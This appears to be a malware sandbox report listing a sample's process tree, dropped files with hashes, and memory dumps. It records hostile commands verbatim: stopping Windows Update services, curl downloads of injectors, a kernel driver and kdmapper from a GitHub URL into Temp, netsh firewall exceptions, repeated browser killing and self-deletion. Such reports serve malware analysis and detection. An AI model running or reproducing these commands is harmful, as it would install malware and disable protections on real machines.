C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2944,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2960 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3400,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3896 /prefetch:9

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&1

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe

"C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Windows\sysldsvp.exe

C:\Users\Admin\AppData\Local\Temp\Files\856.exe

"C:\Users\Admin\AppData\Local\Temp\Files\856.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe"

C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe

"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Users\Admin\AppData\Local\Temp\winrar-info.exe

"C:\Users\Admin\AppData\Local\Temp\winrar-info.exe"

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"

C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe

"C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe"

C:\Users\Admin\AppData\Local\Temp\Files\file.exe

"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"

C:\Windows\SysWOW64\Files\shopfree.exe

"C:\Windows\System32\Files\shopfree.exe"

C:\Users\Admin\AppData\Local\Temp\Files\stub.exe

"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"

C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe

"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe

C:\Windows\system32\timeout.exe

timeout /t 10 /nobreak

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe


C:\Windows\System32\sc.exe

C:\Windows\System32\sc.exe delete "VJAODQWN"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe


C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\856.exe" "856.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\856.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe


C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 1336

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM msedge.exe


Network


Files


MD5 54186f37b791536e4f39826d62d72236
SHA1 ad0b9a2ba4786429d73a4dd93dfa4fed1d59c73a
SHA256 cd17a4829caf97a8e7bfa4ad60d3184f5da5d5de83160805b8c34e300dc191f2
SHA512 99ccc6ff85329a45ba1e98b451a7ea0c6d3f011eb44f82e463e9ffaf318d66c8936942622b0b1971451f6fb8391270af2f2dd6f902a2014df0c583dcc6c8c426

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 fd6edf33d50fd046f5b957a364ca225d
SHA1 cb63bf655b6899ff2b8ec77d4544ce744d52c587
SHA256 198c394dfa30b2040590f67bb887b337d0d97004c4142e8f5ddd59713851722d
SHA512 51ace6568804a36913ae536cdba205269148564530cbacbd54ee7c979272b0949e5f17eb4773839f483d47ced82c875ba7e5f28539cfbca047a06d529ca214ed

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8f250ae3b26f990048540c6f7a0bc812
SHA1 d9dcb3ce234359d3211ded6c21b05fbaee7daed1
SHA256 08ac36762390f19eb2fa415a5908fafe54b96e220096370f8cb2023929dc6c01
SHA512 19ccc108fe1728a957c616c516f14c206f07fced2a0e568df991daa842e5175fcb9b42ebedd028ba1f591410dfda5e26dc851c139b26514b15b382f17614dc7a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 58c3fc1951a2bfe36e52d8d38e8abe25
SHA1 f5f1e20f58a9e437a3cee2c4b30170388d4ab8a6
SHA256 02a0655974b3eb260556c16395b310eb68c89ece83e8f0d8fbca9af01f805122
SHA512 55b7ea21d57ab83f856b99b3eca97f4dc703fe3ae20fb47f7ae4e1e3ba0f661478012f8a493363a9e11da3bbbb796015b1e7b5f5b10feffb66f89bb50ffa9ea8

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6dd5f8889a0d7eac9b7bb17f741667ab
SHA1 5148d4d1da9f16438397f924d98f307d6105087a
SHA256 b1cdf2e73faf80832fde52b0679ac108ead60f0149eb9a028e059fc65bf46ca9
SHA512 7bf5c2c081d3ebf8d8bca37bc9cc40771837ca5075b8c99f504eec291155e27dbde28debcb5cec555602b73584649ebe5d8eba472dd1e988ee4f5ac7c84ed1b7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 4c10a017bb86d5b69377a213ab0e843e
SHA1 04e31640f834eb738a934d05e7efa5db6905852c
SHA256 0b06b493cec1e91c7a4ff92e564b788f69b98acfdd2589ea848d14ee4b85daf5
SHA512 59f41f5b086b45692154e8bd0e84b2b9d2ab77305b9e6ffc2d1c619faedd2c79b9f57c02398553e411a96051047675dc0c5f8c25e686c44dc10cddfc6f679cdf

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 93eafd5962f2359e9f312412eda5bcdc
SHA1 d8166cef4d1caea17f8f1f25f8d6d3a774a512c9
SHA256 f6872c9cdd4ad26a709644155ef34eafea868b8286c247683e7295f2dfd28560
SHA512 fc574b74638a08925680f1633cb88e776d98005e0305752ca34d38793b12f7419a1ce8b008377442326202d49f46f964f9a0c265ea44c0f96db899c0d3ad4217

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 10b4e9547b2c9c75acff3f61c0bdc5f1
SHA1 564d1fe5b164fce65fb6bdd6d71d2bd12c9e7fdc
SHA256 c9e92cf6a27fac53197a85d10ea66f681e1b720b323b9ec8d508754324068351
SHA512 c78fa6193578026869fbec53a33bfde502f5905beb52ccf50334cd273006d222193b54f197967e26ee6ca93fe69790003f26290b5cb4171b1b270bc7acedd8c9

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 ddea8558a47adac95f877797bc4db116
SHA1 0304d715f52ecf457feb9d040dd22c85b361951b
SHA256 06c8ea14ff4897e9d4073cbcce0dff718bb97ad1306e6e7ab47c351cd4c39004
SHA512 fe24f50203ec41949369a42d5888b2652329c74577ac904844b930d6118a7244fc7d5d1d2035d23b3131f8989894b0de475052753159f2bf906e491b67cbf44e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 2d64cc19b78499db63bf423e44bc78fd
SHA1 cd2d9752bd44e7e7ab6a7080309a5f43a1f17cd2
SHA256 a39c54425eeab22e45be2be80e8c98a0a8c875e04f4e41c3c5afa30d9fe78f56
SHA512 78848071e11606498605f6feb1b4620eb65741276f635c10977c4af3efd6e568589af4307135c01b99ffaa9f315577764f2839ad2f18b889308620bf08cb31df

memory/476-3367-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3365-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3363-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3361-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3359-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3356-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3354-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3351-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3349-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3347-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3344-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3341-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3339-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

memory/476-3338-0x000001F2C09A0000-0x000001F2C09A1000-memory.dmp

memory/476-3369-0x000001F2C09B0000-0x000001F2C09B1000-memory.dmp

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6101a24e3d31922211264e999f63ea60
SHA1 445c9b8a77f9e5bad1d42a9f58304fca8b383698
SHA256 4ceb7d0f6f08a934cfd7b28534ff892120e09811b1f238359f8580dd2d5b8d85
SHA512 7f931cf561cd948ba5aa539ce1a3265d7f56a8b58fe36072b2411f1b5273eec3affff172e8132322b5d30d4d6b1ed1d4a5c1ff4bac2cd5bd469448b71abbc439

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6af7c9be587fda3d1baec391a0199468
SHA1 408e89450686dea4e520c937382e40a387a92c7e
SHA256 135ef46c1ac58d07f6a8c784d4239234dc5cc7d59e67c5aabca8ac31d3969c10
SHA512 6659210b599e3a3dbbbd90432d5d2d8fde21bde3b1712d7a46766e99ae6c8805da088281956695828f42ee0106b04f97f631645d0a8b687d596bea3a13f59ddb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 6c727716a687da248bb8a72aedb1b2c6
SHA1 d4025dcfb1488475f0b3908ba6e3834b15df932b
SHA256 30f2a57a46add6a542cbb6d94b3c22c511729e9583baba4983b6ccba88917064
SHA512 346242ca746ea198d3e025dde50078589cff68332c83fdc89272d5fde8f5233892de779d5c6742f8a80d3843f3c9b43f1abd83eb21379216683ae38556897804

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 eee463c1fdb40cf6af8aa49f8ac15f26
SHA1 23512e1cfe69656f9076783cc31f5bdd2b342cb4
SHA256 1e069bdb7a2c7741fc53e4b0271e2ff4bac1a159ef7ca464ebf3e761d0f7986c
SHA512 65ca996619fe748eb9bcfadc2f13babb40c13c16e122c1b72dc51c902e24f44ea1f175a8c241ebab69c4b4eeaabee7248c82e92c8554ea92adb5bf8685cd1fb3

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 a6d118cd234c4fb55234b5f834308688
SHA1 bc73270cb211e7aac9f116b50add03017326d5a4
SHA256 0a840b64c2b05145459c700817befdfecfeb615f21541b175358ccf2a692e5ec
SHA512 a9c234e5e42cbbad60c31d0a1c657adda6ee1e2a2e6fc54e2831457b230c1cf4d4c72199ee032b70d87ee5c270c6f32ca8db61baeb6230b371bab112e82be7a1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 4de509e1dbc2538ec15eacd2101c7377
SHA1 377f7cae02e406b7b1461d57df6434a0a054ad32
SHA256 32fa42995df81cf7117b8ced9df5328de4c893c8c7732f3dd7c4b0940bfe1009
SHA512 4caec8274849f735d986b15fd188242c14ec49924d4e4a6303690ddb8b7e479b0a223c969614aa3f04abb0ba0e696e4e378f01e114e47fab168befed7ef5fa42

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 49eaa9e36b182ebec8684a2e4347f3fc
SHA1 8cf144c9adac734aecf46dd93d8a6a9b23b1344e
SHA256 886abc2cd33fe12e29bf446bb24c08983b37cc532ba19799610247fe0fc7e5a1
SHA512 bd836f62d8e9c04503b2719ee8222d4cdb901756b029b0192dff569f41f055ac045a51db9a53013b0bd0bfe69a8052bdc1b6bda0c73a2a087a4dc7746d65efd6

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8e0afaae6903403a76bd1428fe2760a6
SHA1 eddb1b03c4d8d2ed384dd16d5978c761c77d4d80
SHA256 52362b8b4cf693fde715ba516e88e3f244bdb6674c68b66b849badcec8d36e9b
SHA512 8bc29054d1288c57b445bc7887710d6a2e9cbaa4259671ce41531bfe17b656597954621029c3b15bf560ac9aa9e60a613db33ac82ce820656dbd795b5b7a510f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 8398d0aae437f798df3b600fdd0c54a5
SHA1 39691f0d003dd32d974cfb5c3389e43a4902afa1
SHA256 b6922e88babff4df00878baacddc130812c80dc337311ea59279f48222928591
SHA512 8ef138d588ce91ad0f83391d3c44778469a911d0dc5e51b03b8d3cb4d9235d3a1b6af020728fa5b559fa307e523255b6548fd655bb7208022e65c63b941ac4c7

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 13971f0757b41b7c5e3400667b6dc746
SHA1 53a8a001d6e8dd1214cc54a108ffbaf5fe1314b5
SHA256 bfdb791a957e23ca57cb50248c832aa29ccd0b23cac61c933aa39357fe9149da
SHA512 97e7fc045015e9bf6a051c41058f759717e5fa579f5aaecaf3c9fce9d299ab121914f8f9b3e1bb0025cf43d4faf303249f453be7c9699b934d2c666b64c0aa0e

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 e17d1f02c00a6b95e7e15303467efe86
SHA1 50b662b5b237b1ffabff37f21a08dc43a51f7977
SHA256 67d47eb225c8caa6a478c7e19af091eff3ed28dd4d0f243d577b6c9b22e07db8
SHA512 4726d45df233ba20e3922980c9ddb53d95f3317d653cabf20733a2ad72fd90cb103b3b7e25d03ef7cf6ac030565f438a90a865c2a794394c84ff93834994fb5d

C:\Windows\SysWOW64\Files\testingfile.exe

MD5 4489c3282400ad9e96ea5ca7c28e6369
SHA1 91a2016778cce0e880636d236efca38cf0a7713d
SHA256 cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77
SHA512 adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0

memory/7812-5034-0x0000000000400000-0x0000000000724000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

MD5 9b3fafa68ef718b5b7bf3f1f46c698df
SHA1 cd2de4a0a94d42c278bab73d29d716369ec644f4
SHA256 2443d1fe25f8afbd5b9cd95fdb45e7c6c5b688e815f44f93158e534308d9f9fb
SHA512 a8f180bdf01a59a36e69708420774c2a8607869f8c34ae1e0d40b8298db3b9d88efd0251aa3444b9cdbadad1bf6d8b9d61fb270a41be18f81b10a0505b1b1f28

C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe

MD5 ef0e5882c8bcad3643d51d16c2f5500c
SHA1 6ec8e8996bb693056d2ebcfc18f517d3ec4ca82d
SHA256 b869941a9c476585bbb8f48f7003d158c71e44038ceb2628cedb231493847775
SHA512 e63c5004c7a786ad0c562268817a0f1ed9494cf825ba3e4545e1649c7d3c60fc26ba8aa18bd88fcf44ddadccecbe45890a5e3daead4b16ab3899fdca6de234f1

C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe

MD5 2b01c9b0c69f13da5ee7889a4b17c45e
SHA1 27f0c1ae0ddeddc9efac38bc473476b103fef043
SHA256 d5526528363ceeb718d30bc669038759c4cd80a1d3e9c8c661b12b261dcc9e29
SHA512 23d4a0fc82b70cd2454a1be3d9b84b8ce7dd00ad7c3e8ad2b771b1b7cbca752c53feec5a3ac5a81d8384a9fc6583f63cc39f1ebe7de04d3d9b08be53641ec455

C:\Windows\SysWOW64\Files\JJSPLOIT.V2.exe

MD5 d4a776ea55e24d3124a6e0759fb0ac44
SHA1 f5932d234baccc992ca910ff12044e8965229852
SHA256 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c
SHA512 ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b

memory/6356-5172-0x0000000000880000-0x0000000000BA4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6335125a38dd71b36edac7f9fb7cfe19
SHA1 692416f632879e1f7eea5d6b1ac7322151b0bca0
SHA256 220e953dc6768281881cc33c7ffb0b64a381931b9eb9ad32cff5e0004783213c
SHA512 55668b7b2ab8e1de59a954c7a15c17db9d9105e7929ac1d0f43d85e90c0b79f72487e5f253d700eff75c8402a8d7a1c098445fe413ee3d761a4c214fe155b25a

C:\Users\Admin\AppData\Local\Temp\Files\Authenticator222.exe

MD5 7682909e9bda1e07a178ee76c114e42c
SHA1 026d1a42f40b04f0e9b0e1c14631dd226aa57371
SHA256 c9c2671d59e747d93585102e1af0215aaa8e9680c5616f17599380e5209a0d0d
SHA512 78910bbb0de70c0c24209cbd87631567a3eeced223c8129011e02879ec440e86c3847799c311fc256025fd89e48070dbadbd01a3d9e470a3ada6f3fbb774fbde

C:\Users\Admin\AppData\Local\Temp\Files\csrss.exe

MD5 67e4a0dc097ec49476cd4e56805e5e56
SHA1 178e30d7bb19ba8a9ea5c82e554756666fa499bc
SHA256 d98ecf3bdfc1d007e6bee663d92396a3601ca42525940eff2112d67bf5eea721
SHA512 20713335adf129165b9837b1849886b141b6c2f6c874ee732cfc56e336441552cfd31a352afdd9ca1993763e440552b4fd78a888270e3b36c9f47388e1ec0575

C:\Users\Admin\AppData\Local\Temp\Files\t.exe

MD5 aad6256db1d77092b8aa4a34d562ed74
SHA1 d38639790659cfe9282a74aaadf0c273fa5bdb2b
SHA256 824fc258693bdd485e611fb4ac804af96c2dab12a025ed0b7ed2daebe2e6e0f9
SHA512 1950e25d089d559790b5b477f4308ec5322e1a3d9fff0a9d691905fb8d76d4ac90cb64e53b4b2c971617dc17f928a9785804c01bc73bfa3dd844c0484b2e609b

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Internal.msix.DATA.93F150AB96902244D8787F2CE8009C714E87BE7CCAC9273D499E44C4F23CD771

MD5 29a7e397b4624c7ca723b18697f0c47f
SHA1 4fa6a4416bb7816de763651af3190ba2eaf052a0
SHA256 fe6ef3ae03729d60ea3681aacb7cfb544ff2d34055643bdf55badc91f8e80549
SHA512 7ee96a046c79d018d94d1dc534e724040b23c9c69c551401571c01b6941bc379457fc023da7e933c0a3d9c98c62726953c66bc0dd400ffab2f0b0d0154370042

C:\Users\Admin\AppData\Local\Temp\Files\856.exe

MD5 68edafe0a1705d5c7dd1cb14fa1ca8ce
SHA1 7e9d854c90acd7452645506874c4e6f10bfdda31
SHA256 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d
SHA512 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

C:\Users\Admin\AppData\Local\Temp\Files\WinRarInstall.exe

MD5 af91873c641aab500eba3a3ad6f17b74
SHA1 c52992ba04624bcd87696f9c37c9c708b3c15b9c
SHA256 f568d5c96eefd67d284787b804ab17a610a93dcc48d855515fb187f1b6dba249
SHA512 730a9215911d16cd04d578d7c0f660d3d04282183ad7274bdb18d2f542b044bfe75f76e57fc092bfd6ab28b5f780aff4d01446f8868830d931d860a521795ffc

C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe

MD5 d4e3a11d9468375f793c4c5c2504a374
SHA1 6dc95fc874fcadac1fc135fd521eddbdcb63b1c6
SHA256 0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d
SHA512 9d87f182f02daafad9b21f8a0f5a0eeedb277f60aa2d21bb8eb660945c153503db35821562f12b82a4e84cef848f1b1391c116ff30606cb495cf2e8ce4634217

C:\Users\Admin\AppData\Local\Temp\winrar-info.exe

MD5 cd25f972e64954e2a239dc71deba1543
SHA1 06f03a5d643ee843db318014b245742107ff4442
SHA256 99e4d3d9cf4f315eed1833ebd0412ebf165a0840e2a9737272359c2db81772fc
SHA512 31b732cbc637b67ee0aff91140a12d942df574f1cb8aeada5861bc58139904fa9b0b1611a8333b489a61e94f8f14237394f994eb8f22beb01b9fdbdedbdd3b43

C:\Users\Admin\AppData\Local\Temp\Files\crack.exe

MD5 53e21b02d31fa26942aebea39296b492
SHA1 150f2d66d9b196e545ac5695a8a0001dbd2ef154
SHA256 eecdeeffe3f7627f27eb2683d657a63503744e832702890f4bc97724aeaed73d
SHA512 030f9ab458ecc9954089e88075ca5a9e8bf8fe07483b96a563bc77feaf59cdc4916ed2cc139e7192dcb6f9dc388b8beb837754cf8e79c7c2326ebd02ca5821d1

C:\Users\Admin\AppData\Local\Temp\winrar-x64-701ru.exe

MD5 b53fd2f7cd34ae24dd15b23d2eab08bd
SHA1 994ff51c42d8ed9e8a98b66a7adc172c2fa75c95
SHA256 2177fcc6c2105a01472358ad32a5ce467b4943d69f891cb30bbc82ec42003c60
